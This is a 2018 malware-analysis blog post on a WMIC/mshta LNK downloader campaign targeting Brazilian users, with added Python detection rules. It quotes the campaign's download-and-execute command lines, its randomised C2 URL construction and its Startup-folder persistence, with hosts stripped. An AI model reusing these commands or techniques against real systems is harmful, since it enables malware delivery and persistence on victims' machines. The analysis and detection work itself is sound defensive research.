Monday, 28 May 2018

LNK files targeting Brazilian Users

Recently, I observed a lot of LNK files crafted to target users located in Brazil. The details of this campaign are not documented anywhere and the final stage payloads (binary files) are not even present on public sources such as VirusTotal.

Interestingly, there are numerous references in the source code to characters from World of Warcraft in the form of variable names. The most important reference being: SABNOCK.

This campaign has been active for the past few months; however, the attackers frequently update it.

The original attack vector is an LNK-based downloader sent inside a ZIP archive.

On 25th of May 2018, I observed an LNK file which leveraged WMIC to download the malicious MSI file.

Name of the LNK file: v114googlexx4.lnk
MD5 hash of the LNK file: ac212f8d998343e77edfab76cbf3656e
MD5 hash of the ZIP file: dadc0ec5a5460e8c30859cc6fc3d9d7a

Target of the LNK file: C:\WINDOWS\system32\wbem\WMIC.exe process call create "msiexec.exe /i hxxp:// /q"

And on 27th of May 2018, I observed a new variant that changed the way the next-stage payloads are downloaded.

Name of the LNK file:
MD5 hash of the LNK file: e288ebcfcf2b5b10f774618de059d66b
MD5 hash of the ZIP file: 65f127944263a99c2834d8abf6d408ec

Target of the LNK file: C:\WINDOWS\system32\Wbem\WMIC.exe  os get /format:"hxxp://"

This LNK file leverages WMIC to download an XSL file that contains a script. This is possible because the "/format" command line parameter accepts a URL to the stylesheet, as seen in the target above.

Geo IP check

It is important to note that the C&C Servers in this case use a Geo IP mechanism to ensure that the correct response is given only if the request is coming from the intended targeted region. In this case, the Geo IP check ensures that the request is coming from Brazil.

As an example, if I try to connect to the above URL using a non-Brazilian IP address, we can see that the server returns a 404 Not Found response, as shown below:

Figure 1

I configured my TOR exit node to connect through Brazil. Now, when I attempt to connect to the above URL, it returns the correct response, as shown below:

Figure 2

XSL File Analysis

The main purpose of the XSL file in this case is to leverage mshta to download the malicious JavaScript file from the URL:

    var r = new ActiveXObject("WScript.Shell").Run('mshta.exe javascript:try{try{javascript:GetObject("script:ht"+"tp://");self.close();}catch(e){}}catch(e){};self.close();');
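As an added detection example (my own code, not from the post or the campaign's files), the three command-line patterns described above, WMIC "process call create" launching msiexec with an HTTP package, WMIC "os get /format:" pointing at a remote XSL, and mshta evaluating inline JavaScript that loads a remote scriptlet through GetObject("script:..."), are expressed as regular expressions and run over constructed Sysmon-style process-creation events. The event records and the host example.invalid are constructed; the command lines mirror the LNK targets and the mshta one-liner quoted above.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style).
# These are not records from the campaign; the command lines mirror the
# LNK targets and the mshta one-liner quoted in the post, with
# example.invalid standing in for the stripped hosts.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\WINDOWS\system32\wbem\WMIC.exe",
     "cmdline": r'WMIC.exe process call create "msiexec.exe /i http://example.invalid/v.msi /q"'},
    {"id": 2, "image": r"C:\WINDOWS\system32\Wbem\WMIC.exe",
     "cmdline": r'WMIC.exe os get /format:"http://example.invalid/s.xsl"'},
    {"id": 3, "image": r"C:\WINDOWS\system32\mshta.exe",
     "cmdline": r'mshta.exe javascript:try{try{javascript:GetObject("script:ht"+"tp://example.invalid/s.sct");self.close();}catch(e){}}catch(e){};self.close();'},
    # Benign look-alikes that must not fire: a built-in /format name and a local MSI.
    {"id": 4, "image": r"C:\WINDOWS\system32\wbem\WMIC.exe",
     "cmdline": r"WMIC.exe os get caption /format:list"},
    {"id": 5, "image": r"C:\WINDOWS\system32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\installers\tool.msi /q"},
]

RULES = {
    # WMIC fetching a remote XSL stylesheet via /format (the 27 May variant).
    # A URL scheme is required, so /format:list and other built-in names do not match.
    "wmic_remote_xsl": re.compile(
        r'wmic(?:\.exe)?\b.*?/format:\s*"?\s*https?://', re.I),
    # WMIC spawning msiexec with an HTTP(S) package path (the 25 May variant).
    "wmic_msiexec_http": re.compile(
        r'wmic(?:\.exe)?\b.*?\bprocess\s+call\s+create\b.*?msiexec(?:\.exe)?\s+/i\s+"?https?://', re.I),
    # mshta running inline script that loads a remote scriptlet. The rule keys on
    # GetObject( followed by script:, so splitting "ht"+"tp://" in the URL does not evade it.
    "mshta_remote_scriptlet": re.compile(
        r'mshta(?:\.exe)?\s+(?:javascript|vbscript):.*?GetObject\(\s*"?script:', re.I),
}


def match_rules(cmdline):
    """Return the names of all rules whose pattern occurs in the command line."""
    return [name for name, pattern in RULES.items() if pattern.search(cmdline)]


def scan(events):
    """Map each event id to its matched rule names; events matching nothing are omitted."""
    hits = {}
    for event in events:
        names = match_rules(event["cmdline"])
        if names:
            hits[event["id"]] = names
    return hits


if __name__ == "__main__":
    for event_id, names in scan(SAMPLE_EVENTS).items():
        print(event_id, names)
```

The two benign events are there deliberately: "/format:list" is a legitimate built-in WMIC output format and a local MSI install is routine, so the rules require an http(s) URL in the position where the campaign places it rather than alerting on WMIC or msiexec alone.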

SCT File Analysis

This is the main scriptlet file, which performs the following actions:

1. Downloads the next stage payloads from randomly chosen domains.
2. Configures the system for persistence.
3. Executes the next stage payloads.

Random Domain Selection

radador() is a function in this SCT file that generates a random number between the minimum and maximum values supplied to it as arguments.

pingadori is a random number generated in the range 1 to 52.

Corresponding to each number, there is a domain name which will be used to fetch the next stage payloads.

The complete list of domains is mentioned in the Appendix.

Downloading the Modules

The function Bxaki() takes two parameters:

URL -> The URL from which it needs to fetch the file.
File -> The path to which the file is downloaded.

All the files will be downloaded to the directory: %userprofile%\tempwd

The downloaded URLs are constructed as shown below:

xVRXastaroth2 = "ht"+"tp://vrx"+radador(1111111,9999999)+"."+xVRXastaroth+":"+radador(25010,25099)+"/"+ smaeVar;

1. It generates a random number in the range 1111111 to 9999999 and appends it to the string: "http://vrx".
2. It generates another random number in the range 25010 to 25099. This is the port number.

So the download URLs have both static and dynamic parts. The random numbers are generated to evade detection of the network traffic; however, since some parts of the URL remain static, detection is still possible on that basis.

Below is a summary of the different files downloaded and the corresponding URLs:

sysvw.lnk - Downloaded from the URL: xVRXastaroth2 +""+radador(0000001,999999999)
SABNOCKXa.jpg - Downloaded from the URL: xVRXastaroth2 + ""+radador(0000001,999999999)
SABNOCKXb.jpg - Downloaded from the URL: xVRXastaroth2 + ""+radador(0000001,999999999)
SABNOCKXe.jpg - Downloaded from the URL: xVRXastaroth2 + ""+radador(0000001,999999999)
SABNOCKXf.jpg - Downloaded from the URL: xVRXastaroth2 + ""+radador(0000001,999999999)
SABNOCKXg.gif - Downloaded from the URL: xVRXastaroth2 + ""+radador(0000001,999999999)
SABNOCKXdwwn.gif - Downloaded from the URL: xVRXastaroth2 + ""+radador(0000001,999999999)
system64.exe - Downloaded from the URL: xVRXastaroth2 + "gerarhv121.php?"+radador(0000001,999999999)
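To show how the static parts of the URL can be used for detection, here is an added example (my own code, not the campaign's SCT or anything from the post) that checks a URL against the construction above, a host whose first label is "vrx" followed by seven digits and a port in 25010 to 25099, and runs that check over constructed proxy log lines. It deliberately matches the whole range the SCT can generate rather than any single observed URL. The domain example.invalid, the log line format and the client addresses are assumptions.

```python
import re
from urllib.parse import urlsplit

# Shape of the download URL as built by the SCT: "http://vrx" + 7-digit random
# + "." + <domain> + ":" + port in 25010..25099 + "/" + <path>. Only the random
# parts vary, so the host label prefix and the port range are the stable handle.
HOST_LABEL = re.compile(r"^vrx\d{7}$", re.I)
PORT_MIN, PORT_MAX = 25010, 25099


def is_stage_two_url(url):
    """True if the URL matches the SCT's download-URL construction."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError when the port is not numeric
    except ValueError:
        return False
    if parts.scheme.lower() not in ("http", "https") or not parts.hostname:
        return False
    first_label = parts.hostname.split(".")[0]
    return (HOST_LABEL.match(first_label) is not None
            and port is not None and PORT_MIN <= port <= PORT_MAX)


# Constructed proxy log lines (not captured traffic), one request per line:
# "<iso time> <client> <method> <url> <status>". Lines 3 to 5 are decoys:
# no digits after vrx, wrong port, unrelated site.
SAMPLE_LOG = """\
2018-05-27T13:02:11Z 10.1.4.21 GET http://vrx5820133.example.invalid:25042/x583920111 200
2018-05-27T13:02:12Z 10.1.4.21 GET http://vrx5820133.example.invalid:25042/gerarhv121.php?77120034 200
2018-05-27T13:02:30Z 10.1.4.22 GET http://vrx.example.invalid/index.html 200
2018-05-27T13:03:01Z 10.1.4.23 GET http://vrx1234567.example.invalid:8080/a 404
2018-05-27T13:03:40Z 10.1.4.21 GET https://www.example.org/ 200
"""


def find_hits(log_text):
    """Return (client, url) pairs whose URL matches the campaign's construction."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # skip malformed or empty lines
        client, url = fields[1], fields[3]
        if is_stage_two_url(url):
            hits.append((client, url))
    return hits


if __name__ == "__main__":
    for client, url in find_hits(SAMPLE_LOG):
        print(client, url)
```

Because the host label and port are checked structurally rather than against a list of observed values, a new random number or a new domain drawn from the 52-entry list does not by itself defeat the check; only a change to the "vrx" prefix or the port range would.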

system64.exe is the next stage payload which will be dropped and executed as shown below:

var xxWshShell = new ActiveXObject("WScript.Shell");"\\system64.exe  /xy /"+radador(0000001,999999999),0,true);

This binary will be executed with the command line arguments: "/xy /<random_number>"


The LNK file, sysvw.lnk is downloaded to the path: %userprofile%\tempwd\sysvw.lnk

This LNK file will be copied to the path: %appdata%\microsoft\windows\start menu\programs\startup\ for persistence.

The target of the LNK file is: C:\WINDOWS\explorer.exe /e,/start,system64.exe

It ensures that every time the system is started, the system64.exe binary is executed.

In the follow up blog post, I will share the details of the payload.



List of domains used to fetch the next-stage payload
